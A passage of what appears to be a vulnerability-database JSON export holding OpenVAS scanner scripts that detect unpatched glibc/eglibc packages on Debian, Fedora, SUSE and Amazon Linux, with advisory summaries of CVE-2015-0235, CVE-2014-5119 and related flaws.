rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss-dns-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss-files-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\nfixed in eglibc, Debian", "modified": "2019-03-18T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310703142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703142", "title": "Debian Security Advisory DSA 3142-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3142.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3142-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703142\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_name(\"Debian Security Advisory DSA 3142-1 (eglibc - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 00:00:00 +0100 (Tue, 27 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3142.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"eglibc on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the\nCVE-2015-0235\n\nissue has been fixed in version 2.18-1 of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\nfixed in eglibc, Debian's version of the GNU C library:\n\nCVE-2015-0235\nQualys discovered that the gethostbyname and gethostbyname2\nfunctions were subject to a buffer overflow if provided with a\ncrafted IP address argument. This could be used by an attacker to\nexecute arbitrary code in processes which called the affected\nfunctions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\nTim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\nwordexp function did not suppress command execution in all cases.\nThis allows a context-dependent attacker to execute shell\ncommands.\n\nCVE-2012-6656 CVE-2014-6040\nThe charset conversion code for certain IBM multi-byte code pages\ncould perform an out-of-bounds array access, causing the process\nto crash. In some scenarios, this allows a remote attacker to\ncause a persistent denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-dns-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-files-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-03-05T00:00:00", "id": "OPENVAS:1361412562310869060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869060", "title": "Fedora Update for glibc FEDORA-2015-2845", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2015-2845\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869060\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-05 05:43:08 +0100 (Thu, 05 Mar 2015)\");\n script_cve_id(\"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2014-5119\", \"CVE-2014-0475\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for glibc FEDORA-2015-2845\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-2845\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/150631.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.18~19.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850799", "title": "SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1125_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850799\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-5119\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This glibc update fixes a critical privilege escalation problem and two\n non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n\n * bnc#892065: setenv-alloca.patch: Avoid unbound alloca in setenv.\n\n * bnc#888347: printf-multibyte-format.patch: Don't parse %s format\n argument as multi-byte string.\");\n\n script_tag(name:\"affected\", value:\"glibc on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1125_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-x86\", rpm:\"glibc-locale-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-x86\", rpm:\"glibc-profile-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-x86\", rpm:\"glibc-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120241", "title": "Amazon Linux Local Check: ALAS-2014-399", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-399.nasl 6663 2017-07-11 09:58:05Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120241\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:13 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-399\");\n script_tag(name:\"insight\", value:\"An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-399.html\");\n script_cve_id(\"CVE-2014-5119\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-08-04T10:48:53", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversation functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.", "modified": "2017-07-20T00:00:00", "published": "2014-08-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703012", "id": "OPENVAS:703012", "title": "Debian Security Advisory DSA 3012-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3012.nasl 6769 2017-07-20 09:56:33Z teissa $\n# Auto-generated from advisory DSA 3012-1 using nvtgen 1.0\n# Script version: 